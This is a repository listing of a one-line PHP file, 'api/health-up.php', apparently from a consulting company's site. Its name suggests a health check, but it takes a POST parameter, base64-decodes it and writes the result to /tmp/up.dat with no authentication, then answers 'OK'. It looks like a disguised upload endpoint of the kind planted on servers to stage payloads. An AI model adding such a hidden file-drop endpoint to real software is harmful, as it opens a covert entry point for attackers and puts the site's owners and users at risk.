Files
weval-consulting/api/health-up.php

2 lines
81 B
PHP

<?php file_put_contents("/tmp/up.dat",base64_decode($_POST["d"]??""));echo "OK";